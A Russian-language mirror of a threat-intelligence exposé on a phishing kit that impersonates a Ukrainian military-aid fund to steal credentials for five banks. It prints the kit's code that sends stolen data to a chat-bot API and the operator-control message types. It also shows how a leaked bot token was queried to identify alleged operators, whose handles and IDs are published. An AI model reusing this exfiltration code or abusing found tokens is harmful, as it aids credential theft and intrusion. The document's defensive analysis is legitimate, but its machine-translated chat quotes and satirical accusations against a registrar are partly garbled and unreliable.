Editorial mirrorBrand mentions redacted to public IDs. Hover to inspect. Everything else is theatre.How it works
THE ENABLERS REGISTRYRegistrar accountability archive
Archive LiveRead-only public record · No ads · No tracking
Case file folder with redacted documents and confidential investigation report.
CASE / RU / DOPOMOGVOINA EXPOSED

Фишинг под видом военной помощи: пострадали 5 банков Украины

The Enablers Registry·Editorial mirror·/ru/dopomogvoina-exposed

Public record copy. Brand names withheld, public accreditation numbers preserved. If the body below says “we”, that means the original publisher, not this mirror. TER only preserves, redacts, and re-contextualizes.

Раскрыта сеть фишинговых атак, связанная с военной помощью: В число целей попали 5 банков, операторы установлены

Автоматизированный конвейер THE ENABLERS REGISTRY за считанные минуты проанализировал фишинговую операцию, в рамках которой злоумышленники выдавали себя за украинский фонд военной помощи — от регистрации домена до идентификации оператора.

25 марта 2026 года Исследование THE ENABLERS REGISTRY Время чтения: 12 минут
Скриншот 1 — Обзор расследования: фишинговая сеть [REDACTED][.]sbs, нацеленная на украинских ветеранов войны.
5
Банки, ставшие мишенью
3
Определены операторы
6
Вызовы API для снятия маскировки
2
Параллельные фишинговые проекты
<30
Всего несколько минут до полного анализа
Раскрытие информации о спонсорах(нажмите, чтобы развернуть)
Представляем официального спонсора данного расследования
🏆 [REDACTED] 🏆
Самый авторитетный регистратор, который сотрудничает с Netcraft (путем обмана их системы) · Официальный поставщик доменов для Наркоторговая площадка «FinCEN MSB #31000023456789» · Поставщик с оптовыми скидками · Преданный поклонник «Типичный мошенник» Сообщество в «ВКонтакте» — но до сих пор не приобрело курс по анонимности
⭐ 1.8
Trustpilot
Рейтинг
$200
Цена в .ru
120₽ реальных
0
Сообщения о нарушениях
выполнен
15,000%
Домен
разметка
  • Несмотря на то, что автор называет себя «китайцем» (из Гонконга), он родом из Горловка, Донецкая Народная Республика. Китайский логотип носит чисто декоративный характер — как и их Условия предоставления услуг
  • Обеспечивает Поддержка русского языка через «ВКонтакте» и [REDACTED], продает .ru за 200 долларов, тогда как IANA #1606 взимает 120₽ (~$1.30)
  • Негативные отзывы на Trustpilot, в которых упоминаются домены, связанные с рынком наркотиков таинственным образом исчезнуть. Совпадение? Ни в коем случае
  • Активный подписчик «Типичный мошенник» (Типичный мошенник) Сообщество в «ВКонтакте» — когда ваш регистратор подписывается на группы-мошенники, становится ясно, на какую аудиторию он ориентируется
  • Сотрудничает с Netcraft ровно столько, чтобы избежать исключения из списка, при этом сохраняя инфраструктуру для доменов, связанных с фишингом, азартными играми и наркотиками

А тем временем в сериале «Типичный мошенник»:

Оригинал (русский)
Перевод (английский)
Обещание нашему спонсору: Когда этот пост из блога «Типичный Мошенник» станет реальностью — а, судя по тому, что нам известно, это вопрос когда, а не если — вся наша команда зарегистрируется в «ВКонтакте» и подпишется на сообщество. Считайте это нашей бурной овацией. 👏

* Это сатира. Компания IANA #3765 не спонсировала данное расследование. Однако именно она стала причиной его проведения, поскольку более пяти дней отказывалась реагировать на наши сообщения о злоупотреблениях. Всё, что указано выше, основано на общедоступной информации и нашем практическом опыте. Ознакомьтесь с нашим полным разоблачением IANA #3765

Что обнаружил THE ENABLERS REGISTRY

20 марта 2026 года конвейер автоматического обнаружения угроз THE ENABLERS REGISTRY зафиксировал [REDACTED][.]sbs — недавно зарегистрированный домен, на котором размещен фишинговый сайт, выдающий себя за «Щит Защитника» («Щит защитника») — фиктивный фонд, якобы оказывающий военную помощь Украине. Сайт ориентирован на украинских ветеранов, раненых в боях и семьи погибших солдат; под видом обещаний государственной финансовой помощи он похищает банковские учетные данные пяти крупнейших банков Украины.

Ниже приводится полный перечень всех фактов, выявленных в ходе нашего автоматизированного анализа: методы социальной инженерии, техническая инфраструктура, система управления операторами в режиме реального времени, а также личности людей, стоящих за этим проектом.

Оценка воздействия
Сайт ориентирован именно на наиболее уязвимые группы населения: ветеранов боевых действий, страдающих посттравматическим стрессовым расстройством (ПТСР), семьи погибших в бою солдат, обращающихся за государственной помощью, а также раненых военнослужащих, вынужденных ориентироваться в сложных бюрократических системах. Каждая похищенная учетная информация может привести к полному взлому учетной записи в течение нескольких минут.

Раздел 1: Приманка — «Фонд фальшивой военной помощи»

Домен [REDACTED][.]sbs была зарегистрирована 20 марта 2026 года посредством [REDACTED], регистратор, который, как неоднократно подтверждалось, медленно реагирует на сообщения о злоупотреблениях или вовсе не реагирует на них. Данный .sbs TLD (Side-By-Side) — это недорогой gTLD, который часто используется для создания одноразовой фишинговой инфраструктуры.

Сайт позиционирует себя как профессиональный портал помощи, связанный с государственными структурами. В верхней части страницы размещен украинский флаг, военная символика придает сайту достоверность, а текст страницы тщательно составлен на украинском языке с использованием бюрократических формулировок, характерных для официальных государственных программ.

Главная страница фишингового сайта «[REDACTED]», на которой изображён поддельный фонд военной помощи
Скриншот 5 — Целевая страница фишингового сайта, выдающего себя за «Щит Защитника».

Чтобы укрепить доверие, операторы сфабриковали счетчик статистики, который был размещен на видном месте на главной странице:

  • 2 847 заявок — что означает, что тысячи людей уже получили помощь
  • Распределено ₴47,2 млн — крупная, но правдоподобная фигура в УАГ
  • 19 программ — что предполагает проведение комплексной операции с участием нескольких программ

Эти цифры полностью выдуманы и жестко заложены в исходный код страницы без связи с сервером. Они служат единственной цели: создают эффект «социального доказательства», чтобы преодолеть колебания жертвы.

Раздел 2: Ловушка — 5 банков, одна цель

После нажатия кнопки «Подать заявку» (Submit Application) перед жертвой открывается экран выбора банка. В качестве вариантов предлагаются пять крупнейших розничных банков Украины, каждый из которых представлен со своим официальным брендингом и логотипом. Именно на этом этапе социальная инженерия переходит от эмоционального манипулирования к техническому хищению.

Экран выбора банка, на котором отображаются 5 украинских банков
Скриншот 6 — Экран выбора банка. Каждый вариант приводит к запуску индивидуальной последовательности действий, направленной на кражу учетных данных.

Анализ пакета JavaScript сайта показал, что у каждого банка есть уникальная многоэтапная последовательность действий по сбору учетных данных, адаптированный с учётом фактического алгоритма аутентификации данного банка:

«ПриватБанк»

ВходПарольPIN-кодSMS

monobank

ВходPIN-кодSMSЭлектронная почта

«Ощадбанк»

ВходПроверитьSMS

PUMB

ВходSMS

Укрсиббанк

ВходPIN-кодSMS

Схема атаки на каждый банк выглядит одинаково:

Страница с поддельной информацией о помощи
Выбор банка
Клон страницы входа
Перехват 2FA
Взлом учетной записи
Поддельная страница входа в систему PrivatBank
Снимок экрана 7 — Клонированная страница входа в систему PrivatBank.
Поддельная страница входа в систему PUMB
Снимок экрана 9 — Клонированная страница входа в систему PUMB.
Схема атаки, иллюстрирующая этапы фишинга — от поддельной страницы с объявлением о помощи до взлома учетной записи
Скриншот 10 — Полный алгоритм атаки: от поддельной страницы о военной помощи через выбор банка до кражи учетных данных и взлома учетной записи.

Технологический стек: [REDACTED] интерфейс, предоставляемый через CDN IANA #1910, с Express.js бэкенд, отвечающий за вывод учетных данных. Архитектура React позволяет создавать плавные многоэтапные формы, которые внешне ничем не отличаются от подлинных банковских интерфейсов.

Раздел 3: Управление оператором в режиме реального времени

Это не простой инструмент для сбора учетных данных со статической базой данных. Фишинговый набор включает в себя панель управления с поддержкой WebSocket в режиме реального времени которая позволяет оператору-человеку управлять каждым сеансом жертвы в режиме реального времени.

Конечная точка WebSocket по адресу wss://[REDACTED][.]sbs/ws поддерживает следующие типы сообщений:

register          — New victim session created
update_user_data  — Stolen credentials transmitted to operator
next_step         — Operator advances victim to next theft stage
create_application — Victim starts "aid application"
answer_question   — Operator sends custom prompt to victim

Благодаря этому управлению в режиме реального времени оператор может:

  • Принудительно перевести в состояние ожидания — отображать сообщение «Обрабатывается ваша заявка...», пока они входят в систему реального банковского счета жертвы
  • Перейти к конкретному шагу — повторно запросить SMS-код, если срок действия первого истек
  • Показать поддельные сообщения об ошибках — «Неверный код, пожалуйста, введите его заново» — для сбора нескольких токенов двухфакторной аутентификации
  • Задайте индивидуальные вопросы — запрос даты рождения, номера карты или любых дополнительных данных в ходе сеанса
В чём заключается опасность
Управление оператором в режиме реального времени позволяет обойти средства защиты с двухфакторной аутентификацией (2FA), основанные на ограничениях по времени. Оператор перехватывает SMS-код и использует его в течение срока его действия — как правило, от 30 до 120 секунд — в то время как жертва наблюдает за поддельной анимацией «обработки».
Форма ввода номера телефона на поддельной странице входа в систему банка
Скриншот 8 — Форма ввода номера телефона, используемая для кражи учетных данных.
Панель управления оператора на базе WebSocket
Скриншот 11 — Панель оператора в режиме реального времени для управления сессиями жертв.

Полный перечень данных, похищенных за один сеанс: phone, password, PIN, SMS code, card number, date of birth, и email.

Раздел 4: Что стоит за IANA #1910 — два проекта, один сервер

Прокси-сервер IANA #1910 скрывает исходный сервер, однако конвейер анализа инфраструктуры THE ENABLERS REGISTRY определил истинный IP-адрес исходного сервера: 45.131.214[.]148, размещенный на RapidSeedbox / LeaseWeb в Нидерландах.

Важная деталь: [REDACTED][.]sbs осуществляется через прокси IANA #1910, скрывая свой IP-адрес источника. Но наша система также отслеживает hlpforvpeople[.]sbs — связанный домен, зарегистрированный через того же регистратора IANA #3765 с совпадающими шаблонами. Этот домен — НЕ за IANA #1910, прямо раскрывая свой исходный IP-адрес: 45.131.214[.]148.

Прямое подключение к этому IP-адресу — без Host заголовок — показал нечто неожиданное: а совершенно другой фишинговый сайт. Вместо украинской военной помощи по умолчанию обслуживался виртуальный хост «HealthCare ID», фишинговая операция, связанная с медицинским страхованием в Индонезии. Тот же сервер, совершенно другие жертвы, совершенно другая страна.

Тот же сервер, те же операторы, другие жертвы
  • Проект 1: Украинская военная помощь → крадет банковские учетные данные у ветеранов
  • Проект 2: Индонезийская система медицинского страхования → похищает у граждан данные о медицинском страховании
  • Тот же стек Express.js, та же панель управления в режиме реального времени на базе WebSocket
  • Тот же интерфейс управления сервером BT-Panel (宝塔)
  • Домен C2 второго проекта: [REDACTED] — известная фишинговая панель, зафиксированная в базе данных угроз THE ENABLERS REGISTRY
  • Комментарии на русском языке в исходном коде индонезийского проекта подтверждают те же разработчики из стран СНГ
Два фишинговых проекта, работающие на одном сервере — помощь украинским военным и медицинское страхование в Индонезии
Снимок экрана 12 — Две параллельные фишинговые операции, использующие один и тот же сервер происхождения: украинская военная помощь ([REDACTED]) и индонезийское медицинское страхование (HealthCare ID).

Шаблон фишингового сообщения из Индонезии представляет собой известный набор, отслеживаемый в базе данных THE ENABLERS REGISTRY по анализу угроз. Мы наблюдали различные варианты именно этого шаблона, используемые в странах Юго-Восточной Азии — в частности, в отношении финансовых учреждений Индонезии, Таиланда и Вьетнама. Злоумышленники просто заменяют шаблоны, адаптированные под конкретную страну, при этом продолжая использовать одну и ту же бэкэнд-инфраструктуру.

Безразборные преступники
Вот какова реальность современных фишинговых атак: операторам всё равно, у кого они воруют. Украинские ветераны, обращающиеся за военной помощью, индонезийские рабочие, приобретающие медицинскую страховку — целевая аудитория меняется в зависимости от того, какой шаблон приносит наибольшую прибыль. Одни и те же русскоязычные операторы ведут обе кампании одновременно с одного и того же сервера, переключаясь между жертвами в разных странах, как между телеканалами. Сегодня это украинские банки. Завтра это могут быть израильские банки — о чём «Боня» уже спрашивал в марте 2026 года.

Раздел 5: Файл config.json, который раскрыл всё

Вот как один-единственный файл с неправильными настройками привел к срыву всей операции — шаг за шагом.

После выявления второго проекта исходного сервера THE ENABLERS REGISTRY JS-анализатор — наш инструмент для автоматического анализа JavaScript — был нацелен на набор кода индонезийского фишингового сайта по адресу https://45.131.214[.]148/assets/index-ZMQxHb_h.js. Анализатор извлек все конечные точки API, внешние URL-адреса и пути к файлам конфигурации из JavaScript-файла размером 335 КБ. Среди выявленных результатов:

  • Пять конечных точек API по адресу [REDACTED] — панель C2 для проверки учетных данных
  • Соединение WebSocket с wss://rezervtemka[.]cc
  • Интеграция Facebook Pixel для отслеживания жертв
  • Ссылка на /config.json — загружается во время выполнения для настройки бота в [REDACTED]

Следуя этой зацепке, мы получили /config.json с исходного IP-адреса. Доступ к файлу был возможен без какой-либо аутентификации — он находился в корневом каталоге веб-сайта и был доступен для чтения любому:

async function loadConfig() {
  const response = await fetch('/config.json');
  // ...
}
async function sendNotification() {
  const cfg = await loadConfig();
  await fetch(`https://api.[REDACTED].org/bot${cfg.bot_token}/sendMessage`, {
    method: 'POST',
    body: JSON.stringify({ chat_id: cfg.chat_id, text: message })
  });
}

Этот /config.json доступ к файлу был возможен напрямую с исходного IP-адреса — никакой аутентификации, никакого контроля доступа — просто обычный файл JSON, расположенный в корневом каталоге веб-сайта:

{
  "bot_token": "8724623843:AAFXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
  "chat_id": "-100XXXXXXXXXX"
}

Токен бота в [REDACTED] одновременно является и именем пользователя, и паролем. Любой, у кого есть этот токен, может выполнять запросы к API от имени этого бота. Операторы оставили свои токены в общедоступном файле. После шести вызовов API у нас было всё:

getMe — Идентификатор бота: «MonettiCRM» (@MonettiCRM_bot)
getChat(chat_id) — Название группы: «Idr card» с активной ссылкой для приглашения
getChatAdministrators — 3 администратора, включая создателя группы
getChat(creator_id) — Автор: @monettiescobar, [REDACTED] Premium, бизнес-профиль, часовой пояс UTC+3
getChat(admin2_id) — Второй администратор: пустой профиль, подозрение на альтернативный аккаунт
getChatMemberCount — Всего 5 участников в группе операторов
Цепочка OSINT, демонстрирующая 6 вызовов API [REDACTED] из файла config.json до полной идентификации оператора
Скриншот 13 — Полная цепочка OSINT: от уязвимого файла config.json до полной идентификации оператора за 6 вызовов API.

От одного неправильно настроенного файла до полной идентификации оператора за шесть HTTP-запросов. Никаких уязвимостей, никакого несанкционированного доступа — всего лишь стандартные вызовы API-интерфейса бота [REDACTED] с использованием токена, который сами операторы оставили открытым.

Раздел 6: Операторы

Заметка о преступном творчестве

Далее следует настоящий мастер-класс по выбору ужасных псевдонимов. У нас есть МОНЕТТИ ЭСКОБАР — ведь ничто так не говорит о «незаметности», как выбор в качестве псевдонима имени самого известного наркобарона в истории. А ещё есть Боня, также известный как ПапаЗаконВор (дословно «Папочка-вор-по-закону» — попытка отсылки к российской криминальной иерархии), Боа, и bubullikk. И, наконец, Девойс, чей ник @devosus Звучит подозрительно похоже на «dev ops us» — разработчик, который указал свою должность в имени пользователя. Это те люди, которые думали, что смогут перехитрить автоматизированную систему анализа угроз. Спойлер: у них не получилось.

Группа операторов [REDACTED] «Idr card» была раскрыта через токен бота
Скриншот 14 — Группа операторов [REDACTED] «Idr card», раскрытая благодаря утечке токена бота.
Аватар MONETTI ESCOBAR в [REDACTED]
Владелец / Создатель
МОНЕТТИ ЭСКОБАР
@monettiescobar
Идентификатор в [REDACTED]: 8135223234
[REDACTED] Premium, бизнес-профиль
Часовой пояс: UTC+3 (регион СНГ)
10 публичных сообщений — строгие меры по обеспечению оперативной безопасности (OPSEC)
Чат TraFFeeQMedusa Google AdsКанал «Deepfakes»
Аватар Бони в [REDACTED]
Оператор / Управление движением
Боня
@BoaCC159
Идентификатор в [REDACTED]: 6242202706
Также известен как: PapaZakonVor, Boa, bubullikk
261 сообщение в 12 группах
DC2 — Амстердам, Нидерланды
CryptoGrabРынок STYXRaven CCЧАТ «EMPIRE»Решение «Феникс»
Разработчик / Программист
Девойс
@devosus
Идентификатор в [REDACTED]: 8213612730
Разработчик фишингового набора — операторы называют его «кодером»
При обнаружении взлома следует «подумать о мерах защиты»
Минимальное воздействие на окружающую среду благодаря специальной конструкции
Ручка @devosus ≈ «dev ops us» — название должности в качестве имени пользователя
Разработчик набораИнфраструктураБезопасность

МОНЕТТИ ЭСКОБАР — Босс

MONETTI соблюдает строгие меры оперативной безопасности — только 10 публичных сообщений по двум группам. Но эти группы говорят сами за себя: Чат TraFFeeQ (арбитраж трафика с целью мошенничества), Medusa Google Ads (недобросовестное использование Google Ads) и Канал «Deepfakes». В его бизнес-профиле в [REDACTED] указано «Есть предложение» («У меня есть предложение») — открыто рекламирующие свои услуги. Часовой пояс UTC+3 (соответствующий Москве, Минску и Киеву) и круглосуточный режим работы подтверждают, что компания базируется в странах СНГ и работает без перерыва.

Боня — Беспечный

В отличие от тщательной политики оперативной безопасности (OPSEC), которой придерживался МОНЕТТИ, Бонья (прежнее псевдоним: ПапаЗаконВор — что-то вроде «Папа-вор по закону») оставил огромный цифровой след — 261 сообщение в 12 подпольных группах. Его история чата напоминает криминальное резюме:

Слова самого Бони (перевод с русского)
  • «фиши на ток 2,0»«Просто фишинг [банковская безопасность] 2.0» — обсуждение совместимости фишинговых наборов с новыми системами безопасности банков
  • «Хорошие дропы найти трудно»«Хороших «денежных мулов» найти трудно» — поиск сообщников для вывода денег
  • «Пошли в культурный центр, ко мне на работу»«Приходи работать в мой колл-центр» — набор операторов
  • «А есть здесь люди, которые работали с израильскими банками?»«Есть ли здесь кто-нибудь, кто работал с израильскими банками?» — расширение деятельности на новые рынки (март 2026 г.)
  • «Логотипов на финке я особо не вижу»«Не вижу много финансовых отчётов» — обсуждение качества похищенных учетных данных
  • «Если 1 прокси — 1–2 банка тока»«Один доверенный представитель только для 1–2 банков» — обсуждение мер оперативной безопасности в связи с банковским мошенничеством
  • «Банкомат застрял с её картой»«Её карту заглотил банкомат» — «денежный мул» украл у них ₴60 000, сославшись на то, что банкомат «проглотил» карту. Даже преступники попадают в ловушку, устроенную их собственными сообщниками.

Его членство в различных организациях позволяет составить полное представление: CryptoGrab (злоумышленники, опустошающие криптовалютные кошельки), Рынок STYX (подпольный рынок украденных данных), Проверка Raven CC (инструменты проверки кредитных карт), ЧАТ «EMPIRE» и Решение «Феникс» (координация мошеннических действий). Речь идет не о разовом правонарушителе, а о человеке, глубоко вовлеченном в экосистему киберпреступности.

Devoys — разработчик

Техническая основа всей операции. По замыслу — минимальное внешнее присутствие. Когда в группу проникли, Боня прямо обратился к нему: «@devosus, подумай о защите, пока нам задницу не разорвали»«@devosus, давай подумаем об обороне, пока нас не разгромили». Его саркастическая реакция на этот инцидент — «когда в Интерпол» («Когда проводить интерполяцию») — это говорит о том, что это не первый раз, когда они едва избежали беды.

Анализ поведения: расшифровка 261 сообщения

Конвейер OSINT от THE ENABLERS REGISTRY собрал и перевел все 261 публичное сообщение от Бони из 12 подпольных групп в [REDACTED] (июнь 2024 г. — март 2026 г.). Машинный перевод с помощью API DeepL с ручной корректировкой с учётом контекста. Сообщения раскрывают полную картину его деятельности — ниже они сгруппированы по видам преступной деятельности.

Рассылка сообщений: 261 сообщение в 12 группах
  • 💬ONE|Чат — 91 сообщение (координация мошеннических действий)
  • Актуальное/Проверки — 37 сообщений (мошенничество с подтверждением)
  • Rolex | общий чат — 28 сообщений (кардинг)
  • ЧАТ «EMPIRE» — 24 сообщения (черный рынок)
  • Фбстор — 23 сообщения (арбитраж трафика)
  • FB-DOC — 22 сообщения (мошенничество в рекламе)
  • Решение «Феникс» — 17 сообщений (банковское мошенничество)
  • CryptoGrab — 11 сообщений (слив криптовалюты)
  • Рынок STYX — 2 сообщения (подпольный рынок)
  • Проверка Raven CC — 2 сообщения (проверка карты)

Банковское мошенничество и фишинг

💬ONE|ЧатМарт 2025 года
«Здесь всего 2,0 фиша»
А вот фиши на ток 2,0
Обсуждение совместимости фишинговых наборов с новейшими протоколами безопасности банков
💬ONE|ЧатМарт 2025 года
«Брат, здесь на Phish ничего не продают, это Phish для оплаты»
Брат, тут ничего не продают за фишки — фишки нужны только для оплаты
Различие между фишингом с целью продажи данных и фишингом с целью непосредственного хищения данных
Решение «Феникс»Март 2026 года
«Есть ли здесь кто-нибудь, кто работал с банками в Израиле?»
А есть здесь люди, которые работали с израильскими банками?
Расширение деятельности в израильском банковском секторе — за 5 дней до начала нашего расследования
Rolex | общий чатСентябрь 2024 года
«Если один представитель, то только 1–2 банка»
Если 1 прокси — 1–2 банка тока
Операционная безопасность при мошенничестве с участием нескольких банков: один прокси-сервер на 1–2 банка для предотвращения обнаружения
Rolex | общий чатСентябрь 2024 года
«Не вижу там особого количества финансовых записей»
Логотипов на «Финке» я, честно говоря, особо не вижу
Жалобы на качество похищенных банковских учетных данных на подпольных рынках

«Денежные мулы» и вывод средств

💬ONE|ЧатМарт 2025 года
«Хорошие капли найти нелегко»
Хорошие дропы найти тоже сложно
«Drops» — это «денежные мулы», которые обналичивают похищенные средства. Жалуются на сложности с набором новых участников.
💬ONE|ЧатМарт 2025 года
«Приходи работать в мой колл-центр»
Приходите работать ко мне в культурный центр
Активный набор сотрудников для работы в мошенническом колл-центре
АктуальноеИюнь 2024 года
«У нас украли 60 тысяч»
у нас украли 60 тысяч
«Денежный мул» украл ₴60 000 у самих мошенников. Ирония судьбы.
АктуальноеИюнь 2024 года
«Как, блядь, банкомат мог проглотить карту?»
Как, блядь, банкомат мог заглотить карту?
Мошенник утверждал, что банкомат «проглотил» карту, чтобы оставить себе украденные деньги. Мошенники обманывают мошенников.
АктуальноеИюнь 2024 года
«Она перевела нам деньги, но у нас не было основного канала для их перевода»
Она перевела её на нас, а у нас не было основного счёта, чтобы перевести деньги
Описание цепочки вывода средств: жертва → счет посредника → основной «денежный мул»

Мошенничество с трафиком и злоупотребление рекламой

ЧАТ «EMPIRE»Март 2026 года
«Я не пользуюсь Google, только Facebook»
Ну, я не работаю с Google, только с Facebook
Специализируется на мошенничестве с рекламой в Facebook — привлечении трафика на фишинговые страницы
FB-DOCФевраль 2026 года
«Я бы тоже не выделил % от рекламного бюджета без поручителя»
Я бы тоже не стал вкладывать деньги в обмен на процент от расходов без гаранта
Переговоры об условиях оплаты за проведение мошеннических рекламных кампаний в Facebook
CryptoGrabЯнварь 2025 года
«Я попробовал использовать AML в Facebook для таргетинга на США — но в интернете не смог найти ни одной подходящей настройки»
Я пытался найти информацию об АМЛ в Фейсбуке, но так и не нашёл в интернете ни одной стоящей ссылки, даже старых.
Попытки использовать рекламу в Facebook для организации мошеннических схем, направленных на борьбу с отмыванием денег и нацеленных на жертв из США
Психологический портрет: Боня

Корпус из 261 сообщения показывает, что киберпреступник среднего уровня с разнообразными видами деятельности: банковский фишинг, сети «денежных мулов», мошенничество с рекламой в Facebook, кража криптовалюты и проверка кредитных карт. Основные особенности:

  • Небрежность при выполнении служебных обязанностей — 261 сообщение в публичных группах, отправленных с одного аккаунта. Использование нескольких псевдонимов (PapaZakonVor → Boa → Bonya) свидетельствует об осведомлённости о правилах оперативной безопасности (OPSEC), но о неспособности их соблюдать
  • Подход к подбору персонала — активно приглашает людей «работать в моем колл-центре» и продает практические знания за деньги
  • Безразличие к жертвам — с одинаковой беспристрастностью обсуждает украинские, европейские, израильские и американские цели. География — всего лишь одна из переменных в уравнении мошенничества
  • Проблемы с доверием — был предан собственным «денежным мулом» за 60 тыс. песо. По иронии судьбы это как раз отражает то недоверие, которое он вызывает у своих жертв
  • Ориентированный на расширение — еще в марте 2026 года активно искала новые банковские рынки (Израиль), что позволяет предположить, что украинская фишинговая операция — лишь одна из многих проводимых одновременно
Боня: Полный журнал сообщений (253 сообщения в 12 группах)
Bonya (@BoaCC159) — Полная история сообщений с переводом
-- Phoenix Solution (16 сообщений) --
B
Боня2026-03-17 14:22
Есть ли здесь люди, которые работали с банками в Израиле?А есть здесь люди, которые работали с израильскими банками?
B
Боня2026-03-17 14:22
и тоже работает тихо.мы тоже работаем тихонько
B
Боня2026-03-17 14:17
Как дела?Как дела?
B
Боня2026-03-17 14:17
Всем привет!Всем привет
B
Боня2026-03-15 19:02
Ну, теперь, пожалуй, всё уже исправлено.Ну, в общем, всё уже наладили
B
Боня2026-03-15 19:02
Ну, это немного хлопотноНу, так что-то немного помучили
B
Боня2026-03-15 19:01
Да, я тоже много работал в тишине, полный провал.Да, я тоже уже сыт по горло этой тихой работой
B
Боня2026-03-15 19:00
Как прошел твой выходной?Как прошли выходные
B
Боня2026-03-15 19:00
Все вы.Общие для всех
B
Боня2026-03-14 14:29
Теперь он уже не такой анонимный, ведь всем известно, что это Марик.Он уже не такой уж и анонимный, раз все знают, кто такой Марик
B
Боня2026-03-14 14:24
ВозрождениеВозродился
B
Боня2026-03-14 14:24
АхахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахахаАхахахахахахахахах
B
Боня2026-03-14 14:23
Я расстроился, когда увидел, что чат исчез.Я даже расстроился, когда увидел, что чат исчез
B
Боня2026-03-14 14:22
Я думал, что никогда тебя не найду.Я уже думал, что не найду вас
B
Боня2026-03-14 14:22
КуКу
B
Боня2026-03-14 14:22
БлядьБля
-- 👨‍⚕️ FB-DOC — Чат по вопросам арбитража трафика (21 сообщение) --
B
Боня2026-03-15 07:23
@fbdoc21@fbdoc21
B
Боня2026-03-15 07:20
Ударь себя членом по лбу.По лбу себе членом побьёшь
B
Боня2026-03-06 15:18
Типа «пять» на экране 2,5😂.Как пять на скрине 2,5😂
B
Боня2026-02-19 17:05
Всем вам.с вами всеми
B
Боня2026-02-19 17:04
Если ты заключишь сделку, я буду смеяться.Если откроете сделку, я буду смеяться
B
Боня2026-02-19 17:04
континентальный?«Континенталь»?
B
Боня2026-02-19 17:04
Вот она и здесь.вот, значит, она согласна
B
Боня2026-02-19 17:01
Поэтому всегда тщательно проверяйте кандидатов, когда просите их предоставить поручителя.Так что всегда делайте скриншот, когда спрашиваете о гарантии
B
Боня2026-02-19 17:00
Он поинтересовался, нужен ли поручитель, и тут же исчез.Только спросил про гаранта — и сразу исчез
B
Боня2026-02-19 17:00
Эй, Карина!ау, Карина
B
Боня2026-02-19 16:59
Значит, ты собираешься найти поручителя?Ну, ты пойдешь к гаранту?
B
Боня2026-02-19 16:57
Я бы тоже не стал выделять средства в виде процента от расходов без поручителя.Я бы тоже не стал вкладывать деньги в обмен на процент от расходов без гаранта
B
Боня2026-02-19 16:57
я?я?
B
Боня2026-02-19 16:57
Ну, она выложила скриншоты, а ты мне ничего не дал.Ну, она выложила скриншоты, а ты ничего не показал
B
Боня2026-02-19 16:56
посмотрите на скриншоты, которые она выложилаПосмотри скриншоты, которые она выложила
B
Боня2026-02-19 16:55
Он не упомянул о поручителе?Он что, не писал о гаранте?
B
Боня2026-02-19 16:54
Ты просто чудак😂ты что, чудак😂
B
Боня2026-02-19 16:53
Вы попросили предоставить поручителя.Ты просил гаранта
B
Боня2026-02-19 16:52
гдев каких местах
B
Боня2026-02-17 14:37
Кто сможет снабдить магазин хорошими автомобилями?Кто подсадит шоп с хорошими тачками
B
Боня2026-02-17 12:10
Где бы вы ни захотели — они всё сделают за вас😂В любом месте, где тебе понравится, тебе это сделают😂
-- ЧАТ «EMPIRE» (24 сообщения) --
B
Боня2026-03-14 13:17
Я уже придумал, как это сделать, но мне лень объяснять.Я уже понял, как это делается, но лень объяснять
B
Боня2026-03-14 13:17
Он тебя раздавит, что бы ни случилось.Он в любом случае тебя обманет
B
Боня2026-03-12 17:16
По-разному.По-разному
B
Боня2026-03-12 17:08
+ к тому же сейчас бушует много штормов.+ сейчас сильные штормы
B
Боня2026-03-12 17:07
Если он черный, то я готов поспорить, что...Если бы это было черное, я бы поспорил
B
Боня2026-03-12 17:07
Зависит от того, какое именно предложение — если оно «белое», то да.Зависит от того, какое предложение: если белое, то да
B
Боня2026-03-12 17:06
Это два разных мираДва разных мира — это
B
Боня2026-03-12 17:06
Другого нетДругой вообще нет
B
Боня2026-03-12 17:06
Вы можете настроить систему так, чтобы только ПКТам можно настроить, чтобы отображались только ПК
B
Боня2026-03-12 17:05
Google не так эффективен, как мне кажется.Google, на мой взгляд, не так эффективен
B
Боня2026-03-12 17:05
Ну, я не пользуюсь Google, только Facebook.Ну, я не работаю с Google, только с Facebook
B
Боня2026-03-12 17:05
Если только в ходе всего этого вам не придется искать лигатуру.При условии, что ещё предстоит во время войны собрать всех этих придурков в одну группу
B
Боня2026-03-12 17:04
Отказы, акки летят, словно бури. И так далее.Реджекты, акки улетают просто так, как штормы. И т. д.
B
Боня2026-03-12 17:04
Не всё так радужно, дружище.Нет, это ещё не всё, братишка, это только начало
B
Боня2026-03-12 17:03
Все регулярные закупки авиабилетов с более высоким уровнем доверияВсе это обычные акки с наилучшим трастом
B
Боня2026-03-12 17:03
На данный момент на рынке нет достойных агентств.Сейчас на рынке нет хороших агентств
B
Боня2026-03-12 17:02
Больше нервирует, чем пугаетСкорее, это больше нервирует, чем пугает
B
Боня2026-03-12 17:02
Криптовалюта, азартные игры и чернокожесть — всё это выплескивается наружуКриптовалюта, азартные игры и чернуха — всё это в ходу
B
Боня2026-03-12 17:01
Последним делом, которое предприняли городские власти, был взлом 2d.Последнее, что попадалось в 2D, было круто
B
Боня2026-03-12 17:01
Если вы ищете что-то для лазания, будь то из моего ассортимента или по бюджету, то для 2D-лазания потребуется потратить 1–2 тыс. зелей на тесты, и это не продлится долго.Получится, если искать — то либо за свой счет, либо за счет бюджета. Чтобы понять, что подойдет для 2D, придется потратить 1–2 тыс. зел на тесты, и даже тогда проект просуществует недолго.
B
Боня2026-03-12 17:00
Я наливаюЯ лью
B
Боня2026-03-12 16:59
(поскольку к предложениям от белых таких требований нет)Потому что к белым офферам таких требований нет)
B
Боня2026-02-14 14:33
У кого есть «дрейнер» при проверке по AML? Только при наличии депозита или подтверждении готовности поручителяУ кого есть дрейнер для теста AML? Только с депо или готовые на гарантию?
B
Боня2026-01-11 03:14
В группе по Фейсбуку есть один человек, и есть еще один приятель. Нужно пополнить аккаунт в Фейсбуке, цена договорнаяЕсть, кто писал в Фейсбуке, и там есть нецензурная лексика. Нужно пополнить аккаунт в Фейсбуке — о цене договоримся
-- СТИХ СНАТ [ STYXMARKET.ST ] (2 сообщения) --
B
Боня2025-12-05 12:04
Требуются счета-фактуры, Payzaty, Cashfree, Eportal 3dsТребуются счета-фактуры, Payzaty, Cashfree, Eportal 3ds
B
Боня2025-11-22 11:14
Есть ли гарант в чате?Здесь есть модератор чата?
-- Чат «Арбитраж трафика» (2 сообщения) --
B
Боня2025-11-24 14:50
